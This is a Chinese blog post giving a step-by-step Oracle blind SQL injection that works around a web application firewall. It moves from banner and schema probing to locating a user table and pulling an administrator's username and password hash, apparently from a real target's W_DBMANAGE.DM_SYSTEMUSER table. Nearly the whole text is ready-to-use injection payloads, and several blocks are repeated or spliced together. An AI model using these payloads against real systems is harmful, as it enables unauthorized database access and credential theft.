Oralce注入 bypass waf出数据

   发存货:

    探测banner 版本号:

    
' and (SELECT banner FROM v$version where rownum=1) like 'O%' and '1'like'1

 

 

 

 

  rownum 相当于mysql的limit

  跑库:
   
' and (select owner from all_tables where rownum=1) like '_%' and '1'like'1

  

 

 

  查询用户管理库:

    

 

 

 

  跑表名:

  
' and (select table_name from user_tables where rownum = 1) like '%_%' and '1'like'1

  

 

 

  跑出第一个表名:

  
' and 1=decode(substr((select table_name from user_tables where rownum = 1),1,1),'S',1,0) and '1'='1

  

 

 

  判断跑第二个表,因为oracle没limit,也没top,使用like 

  获取到第一个表名是ZDZ****
  善用like:
  假设表名是SYS,含义就是排除SYS表
  
'and+(select+table_name+from+user_tables+where+rownum=1+and+table_name+!='SYS')+like+'%%'+and'1'like'1|

  那么如何快速定位oracle数据库用户表:

  

 

 

  在数据库里面,%_%代表匹配包含的内容

返回真说明存在包含ZTZ名称的oralce表。那么定位用户表就很简单了
一些用户名表关键字:account/login/User/USER/ACCOUNT
跑DM_SYSTEMUSER表包含pass的列名:
  
'and(select+W_DBMANAGE.column_name+from+all_tab_columns+W_DBMANAGE+where+rownum=1+and+W_DBMANAGE.TABLE_NAME+like'DM_SYSTEMUSER'+and+W_DBMANAGE.column_name+like+'%25PASS%25')+like'%25%25'and'1'like'1

  

 

 

跑PASSWORD列:
跑DM_SYSTEMUSER表包含pass的列名:
'and(select+W_DBMANAGE.column_name+from+all_tab_columns+W_DBMANAGE+where+rownum=1+and+W_DBMANAGE.TABLE_NAME+like'DM_SYSTEMUSER'+and+W_DBMANAGE.column_name+like+'%25PASS%25')+like'%25%25'and'1'like'1

跑出具体列名:PASSWORD
'and(select+W_DBMANAGE.column_name+from+all_tab_columns+W_DBMANAGE+where+rownum=1+and+W_DBMANAGE.TABLE_NAME+like'DM_SYSTEMUSER'+and+W_DBMANAGE.column_name+like+'PASSWORD')+like'%25%25'and'1'like'1
出数据:
跑password
' and (select PASSWORD from W_DBMANAGE.DM_SYSTEMUSER where rownum=1) like '%%' and '1'='1

长度32
' and length((select PASSWORD from W_DBMANAGE.DM_SYSTEMUSER where rownum=1)) like '32' and '1'like'1出数据:
跑password
' and (select PASSWORD from W_DBMANAGE.DM_SYSTEMUSER where rownum=1) like '%%' and '1'='1

长度32
' and length((select PASSWORD from W_DBMANAGE.DM_SYSTEMUSER where rownum=1)) like '32' and '1'like'1

 

 

 

  跑USERNAME列数据:

  
+and+(select+USERNAME+from+W_DBMANAGE.DM_SYSTEMUSER+where+rownum=1)+like+'%25admin%25'+and+'1'like'1

 

  用户名是admin:
    

 

 

    

完整操作:
oracle注入
跑banner
' and (SELECT banner FROM v$version where rownum=1) like '_%' and '1'like'1

跑库名 默认oracle第一个表是SYS
' and (select owner from all_tables where rownum=1 and owner like '%SYS%') like '%_%' and '1'like'1

模糊测试一些包含敏感数据的表
' and length((select owner from all_tables where rownum=1 and owner like '%MANAGE%'))=10 and '1'like'1

获取表名长度10
继续跑完整MANAGE表
' and 1=decode(substr((select owner from all_tables where rownum=1 and owner like '%MANAGE%'),1,1),'S',1,0) and '1'='1

获取到表名:W_DBMANAGE

' and 1=decode(substr((select owner from all_tables where rownum=1),1,1),'S',1,0) and '1'='1

跑表名:


' and (select table_name from user_tables where rownum = 1) like '%_%' and '1'like'1


' and 1=decode(substr((select table_name from user_tables where rownum = 1),1,1),'S',1,0) and '1'='1

跑W_DBMANAGE数据库下的表信息
' and (select W_DBMANAGE.table_name from user_tables where rownum = 1) like '%_%' and '1'like'1
用这个语句跑表信息,好像有点问题
正确的查询办法:
'+and+(select W_DBMANAGE.table_name from all_tables W_DBMANAGE where rownum=1 and W_DBMANAGE.table_name like+'USER%25') like+'%25%25'+and+'1'like'1

'+and+length((select W_DBMANAGE.table_name from all_tables W_DBMANAGE where rownum=1 and W_DBMANAGE.table_name like+'USER%25')) like+'5'+and+'1'like'1

 成功定位到用户表 W_DBMANAGE下的%USER%表
跑用户表:
' and (select table_name from user_tables where rownum = 1 and table_name like '%ZDZ%') like '%_%' and '1'like'1

跑列名:

' and (select W_DBMANAGE.column_name from user_col_comments W_DBMANAGE where table_name like '%USER%' and rownum=1) like '%%' and '1'='1

查询W_DBMANAGE下的%USER%表下的列名:
'and(select+W_DBMANAGE.column_name+from+all_tab_columns+W_DBMANAGE+where+rownum=1+and+W_DBMANAGE.TABLE_NAME+like'%25USER%25'+and+W_DBMANAGE.column_name+like+'%25PASSWORD%25')+like'%25%25'and'1'like'1

列名有password



跑DM_SYSTEMUSER表包含pass的列名:
'and(select+W_DBMANAGE.column_name+from+all_tab_columns+W_DBMANAGE+where+rownum=1+and+W_DBMANAGE.TABLE_NAME+like'DM_SYSTEMUSER'+and+W_DBMANAGE.column_name+like+'%25PASS%25')+like'%25%25'and'1'like'1

跑出具体列名:PASSWORD
'and(select+W_DBMANAGE.column_name+from+all_tab_columns+W_DBMANAGE+where+rownum=1+and+W_DBMANAGE.TABLE_NAME+like'DM_SYSTEMUSER'+and+W_DBMANAGE.column_name+like+'PASSWORD')+like'%25%25'and'1'like'1

出数据:
跑password
' and (select PASSWORD from W_DBMANAGE.DM_SYSTEMUSER where rownum=1) like '%%' and '1'='1

长度32
' and length((select PASSWORD from W_DBMANAGE.DM_SYSTEMUSER where rownum=1)) like '32' and '1'like'1



跑数据

' and 1=decode(substr((select PASSWORD from W_DBMANAGE.DM_SYSTEMUSER where rownum=1),1,1),'S',1,0) and '1'='1
最后跑出password

然后跑username:
+and+(select+USERNAME+from+W_DBMANAGE.DM_SYSTEMUSER+where+rownum=1)+like+'%25admin%25'+and+'1'like'1

 

 

 

 

 

 

 

 

 

 

 

 

 

posted @ 2021-03-31 17:06  飘渺红尘✨  阅读(392)  评论(0编辑  收藏  举报
Title